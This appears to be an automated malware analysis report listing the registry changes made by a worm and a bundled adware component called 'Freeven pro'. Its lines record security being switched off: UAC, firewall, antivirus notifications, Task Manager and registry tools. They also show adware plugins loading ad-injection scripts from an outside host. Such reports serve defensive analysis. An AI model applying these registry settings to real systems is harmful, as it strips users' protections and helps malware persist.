[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"DisplayName" = "Freeven pro"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppPath" = "%Program Files%\Freeven pro"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"DisplayIcon" = "%Program Files%\Freeven pro\utils.exe"
"Publisher" = "Freeven"
[HKLM\SOFTWARE\Freeven pro\Installer]
"BundledIe" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppName" = "Freeven pro-bg.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppPath" = "%Program Files%\Freeven pro"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"CrAppId" = "54248"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppName" = "Freeven pro-codedownloader.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 1E 98 3B FA 27 D3 5F E6 DB 60 96 9F D9 33 E6"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"Policy" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppName" = "Freeven pro-codedownloader.exe"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppPath" = "%Program Files%\Freeven pro"
[HKLM\SOFTWARE\Freeven pro\Installer]
"BundledChrome" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Worm modifies the IE security zone settings to map all local web nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1860 makes changes in the system registry.
The Worm creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Aas]
"a1_0" = "3432392762"
[HKCU\Software\Aas\695404737]
"35845605" = "476"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Aas]
"a3_0" = "17001001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "144"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKCU\Software\Aas\695404737]
"21507363" = "0"
"28676484" = "35"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A FD FA BB EA 61 DD 80 E7 D5 ED 3C F1 85 44 26"
[HKCU\Software\Aas]
"a2_0" = "5517"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Aas]
"a4_0" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"
Adds a rule to the Windows firewall which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"
Task Manager is disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"
The process 875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe:1180 makes changes in the system registry.
The Worm creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 39 13 D7 37 B7 61 90 FA 78 35 BD F7 FF B6 0D"
The process 875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe:508 makes changes in the system registry.
The Worm creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 8F CB F6 60 FA 98 AE 6F 69 75 B0 95 35 D0 20"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process WINMINE.EXE:1048 makes changes in the system registry.
The Worm creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 B5 46 A7 6F AF E2 6A 7E 95 1F 16 75 E6 3D 2B"
The process WINMINE.EXE:3776 makes changes in the system registry.
The Worm creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A E2 E1 83 7B 44 76 38 04 07 94 2A 66 5B 7E 80"
The process WINMINE.EXE:544 makes changes in the system registry.
The Worm creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 45 2D DF A8 89 E0 A3 8C 14 F3 A9 D5 80 FF AC"
The process Freeven pro-codedownloader.exe:2144 makes changes in the system registry.
The Worm creates and/or sets the following values in the system registry:
[HKCU\Software\Freeven pro\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\Freeven pro\Plugins\390]
"Version" = "1"
[HKCU\Software\Freeven pro\Plugins\39]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\Freeven pro\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\Freeven pro\Plugins\78]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/78.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Freeven pro\Plugins\14]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/14.js"
[HKCU\Software\Freeven pro\Plugins\288]
"Name" = "firstoffer_pricecomp_m"
[HKCU\Software\Freeven pro\Plugins\2]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/2.js"
[HKCU\Software\Freeven pro\Plugins\40]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\102]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/102.js"
[HKCU\Software\Freeven pro\Plugins\345]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/345.js"
[HKCU\Software\Freeven pro\Manifest]
"Manifest" = "NA"
[HKCU\Software\Freeven pro\Plugins\47]
"Version" = "3"
[HKCU\Software\Freeven pro\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\Freeven pro\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) { if (appAPI.internal.monetization.getCampaignId() == 0) { appAPI.internal.monetization.loader.setCampaignId(1026); } }};"
[HKCU\Software\Freeven pro\Plugins\36]
"Name" = "IEBackground"
[HKCU\Software\Freeven pro\Plugins\345]
"Name" = "pluginsVerticals"
[HKCU\Software\Freeven pro\Manifest]
"PublisherName" = "Freeven"
[HKCU\Software\Freeven pro\Plugins\354]
"Version" = "2"
[HKCU\Software\Freeven pro\Plugins\45]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\180]
"Version" = "12"
[HKCU\Software\Freeven pro\Plugins\380]
"Name" = "callcenter_j_m"
[HKCU\Software\Freeven pro\Plugins\334]
"Name" = "sharonl_ws_m"
[HKCU\Software\Freeven pro\Plugins\376]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/376.js"
[HKCU\Software\Freeven pro\Plugins\273]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/273.js"
[HKCU\Software\Freeven pro\Plugins\288]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/288.js"
[HKCU\Software\Freeven pro\Manifest]
"Version" = "111"
[HKCU\Software\Freeven pro\Plugins\9]
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\273]
"Name" = "aedgency_back_button_m"
[HKCU\Software\Freeven pro\Plugins\180]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/180.js"
[HKCU\Software\Freeven pro\Manifest]
"Description" = "Feven Shopping Companion"
[HKCU\Software\Freeven pro\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\Freeven pro\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\Freeven pro\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\Freeven pro\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\Freeven pro\Plugins\230]
"Version" = "7"
[HKCU\Software\Freeven pro\Plugins\64]
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\180]
"Name" = "bpo_serp_m"
[HKCU\Software\Freeven pro\Plugins\200]
"Name" = "foxydeal_m"
[HKCU\Software\Freeven pro\Plugins\41]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/41.js"
[HKCU\Software\Freeven pro\Plugins\43]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/43.js"
[HKCU\Software\Freeven pro\Plugins\7]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\220]
"Version" = "38"
[HKCU\Software\Freeven pro\Plugins\195]
"Version" = "28"
[HKCU\Software\Freeven pro\Manifest]
"RunInFrame" = "false"
"ChangePrevious" = "false"
[HKCU\Software\Freeven pro\Plugins\253]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/253.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Freeven pro\Plugins\45]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/45.js"
[HKCU\Software\Freeven pro\Plugins\94]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/94.js"
[HKCU\Software\Freeven pro\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Freeven pro\Manifest]
"EnableSearchIE" = "false"
[HKCU\Software\Freeven pro\Plugins\391]
"Version" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Freeven pro\Plugins\17]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\193]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/193.js"
[HKCU\Software\Freeven pro\Plugins\78]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\246]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/246.js"
[HKCU\Software\Freeven pro\Plugins\345]
"JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390],intext:[103,117,123,142,259,263,342,359,360,391],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389]};"
[HKCU\Software\Freeven pro\Plugins\4]
"URL" = "http://js.ourstatsstaticstack.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\Freeven pro\Plugins\260]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\281]
"Version" = "3"
[HKCU\Software\Freeven pro\Debug]
"IsDebuggingPlugins" = "0"
[HKCU\Software\Freeven pro\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\Freeven pro\Plugins\260]
"Name" = "pricedetect_sidebar_m"
[HKCU\Software\Freeven pro\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKCU\Software\Freeven pro\Plugins\13]
"Version" = "7"
[HKCU\Software\Freeven pro\Manifest]
"homepageurl" = "NA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Freeven pro\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,345,354,253,102,180,184,193,220,195,200,221,223,230,233,242,260,273,281,288,334,375,380,390,391,91"
[HKCU\Software\Freeven pro\Plugins\390]
"Name" = "50pops_new_m"
[HKCU\Software\Freeven pro\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\Freeven pro\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\Freeven pro\Plugins\91]
"Version" = "135"
[HKCU\Software\Freeven pro\Plugins\375]
"Version" = "1"
[HKCU\Software\Freeven pro\Plugins\2]
"Version" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Freeven pro\Installer]
"osName" = "XP32"
[HKCU\Software\Freeven pro\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Freeven pro\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\Freeven pro\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKCU\Software\Freeven pro\Plugins\36]
"Version" = "8"
[HKCU\Software\Freeven pro\Plugins\4]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\200]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\Freeven pro\Plugins\281]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/281.js"
[HKCU\Software\Freeven pro\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\Freeven pro\Manifest]
"BgVersion" = "1"
[HKCU\Software\Freeven pro\Plugins\184]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/184.js"
[HKCU\Software\Freeven pro\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\Freeven pro\Plugins\36]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/36.js"
[HKCU\Software\Freeven pro\Plugins\376]
"Name" = "loaderBackup"
[HKCU\Software\Freeven pro\Plugins\47]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/47.js"
[HKCU\Software\Freeven pro\Plugins\37]
"Version" = "6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\Freeven pro\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"
[HKCU\Software\Freeven pro\Plugins\42]
"Version" = "10"
[HKCU\Software\Freeven pro\Plugins\288]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\193]
"Name" = "revizer_p_dynamic_b2b_m"
[HKCU\Software\Freeven pro\Plugins\41]
"Version" = "7"
[HKCU\Software\Freeven pro\Plugins\390]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/390.js"
[HKCU\Software\Freeven pro\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\Freeven pro\Plugins\46]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/46.js"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 A1 8E 10 A3 B2 48 6C 74 29 09 40 DD 97 B9 4E"
[HKCU\Software\Freeven pro\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\Freeven pro\Plugins\195]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/195.js"
[HKCU\Software\Freeven pro\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,345,354,253,102,180,184,193,220,195,200,221,223,226,230,233,242,260,273,281,288,334,375,380,390,391,91,376"
[HKCU\Software\Freeven pro\Plugins\354]
"JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""
[HKCU\Software\Freeven pro\Plugins\193]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\391]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/391.js"
[HKCU\Software\Freeven pro\Plugins\260]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/260.js"
[HKCU\Software\Freeven pro\Plugins\102]
"Version" = "15"
[HKCU\Software\Freeven pro\Plugins\334]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/334.js"
[HKCU\Software\Freeven pro\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"
[HKCU\Software\Freeven pro\Plugins\246]
"Name" = "setup"
[HKCU\Software\Freeven pro\Plugins\230]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/230.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Freeven pro\Manifest]
"ThanksUrl" = "NA"
"PublisherId" = "21636"
[HKCU\Software\Freeven pro\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\Freeven pro\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\Freeven pro\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\Freeven pro\Plugins\345]
"Version" = "13"
[HKCU\Software\Freeven pro\Plugins\7]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/7.js"
[HKCU\Software\Freeven pro\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\Freeven pro\Plugins\233]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/233.js"
[HKCU\Software\Freeven pro\Plugins\380]
"Version" = "1"
[HKCU\Software\Freeven pro\Plugins\375]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/375.js"
[HKCU\Software\Freeven pro\Manifest]
"ModeType" = "production"
[HKCU\Software\Freeven pro\Plugins\35]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\Freeven pro\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferUrl" = "NA"
[HKCU\Software\Freeven pro\Plugins\246]
"Version" = "17"
[HKCU\Software\Freeven pro\Plugins\38]
"Version" = "4"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Freeven pro\Plugins\230]
"Name" = "revizer_ws_dynamic_b2b_2_m"
[HKCU\Software\Freeven pro\Plugins\46]
"Version" = "5"
[HKCU\Software\Freeven pro\Manifest]
"PluginsManifestVersion" = "103"
[HKCU\Software\Freeven pro\Plugins\37]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/37.js"
[HKCU\Software\Freeven pro\Plugins\226]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\380]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/380.js"
[HKCU\Software\Freeven pro\Plugins\375]
"Name" = "Dealply_tourist_widget_m"
[HKCU\Software\Freeven pro\Plugins\221]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\14]
"Version" = "11"
[HKCU\Software\Freeven pro\Plugins\42]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/42.js"
[HKCU\Software\Freeven pro\Plugins\38]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/38.js"
[HKCU\Software\Freeven pro\Plugins\334]
"Version" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\354]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/354.js"
[HKCU\Software\Freeven pro\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\Freeven pro\Plugins\35]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/35.js"
[HKCU\Software\Freeven pro\Manifest]
"SetNewTab" = "false"
"Name" = "Freeven pro"
[HKCU\Software\Freeven pro\Plugins\253]
"Version" = "2"
[HKCU\Software\Freeven pro\Plugins\94]
"Version" = "2"
[HKCU\Software\Freeven pro\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"
[HKCU\Software\Freeven pro\Plugins\221]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/221.js"
[HKCU\Software\Freeven pro\Plugins\3]
"Version" = "2"
"Name" = "ie8_fix_2"
[HKCU\Software\Freeven pro\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\Freeven pro\Plugins\13]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/13.js"
[HKCU\Software\Freeven pro\Plugins\220]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/220.js"
[HKCU\Software\Freeven pro\Plugins\184]
"Version" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Freeven pro\Plugins\91]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/91.js"
[HKCU\Software\Freeven pro\Plugins\44]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/44.js"
[HKCU\Software\Freeven pro\Code]
"NewTabJavaScript" = ""
[HKCU\Software\Freeven pro\Plugins\200]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/200.js"
[HKCU\Software\Freeven pro\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\Freeven pro\Plugins\226]
"Name" = "set_campaign_id_m"
[HKCU\Software\Freeven pro\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\Freeven pro\Plugins\40]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/40.js"
[HKCU\Software\Freeven pro\Code]
"AppJavaScript" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Freeven pro\Plugins\233]
"Version" = "7"
"Name" = "revizer_p_dynamic_b2b_2_m"
[HKCU\Software\Freeven pro\Plugins\226]
"URL" = "http://js.ourstatsstaticstack.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"
[HKCU\Software\Freeven pro\Plugins\43]
"Version" = "5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Freeven pro\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\Freeven pro\Plugins\64]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/64.js"
[HKCU\Software\Freeven pro\Plugins\281]
"Name" = "ibario_tier3_pops_m"
[HKCU\Software\Freeven pro\Plugins\273]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\Freeven pro\Plugins\39]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/39.js"
[HKCU\Software\Freeven pro\Plugins\44]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\223]
"Version" = "9"
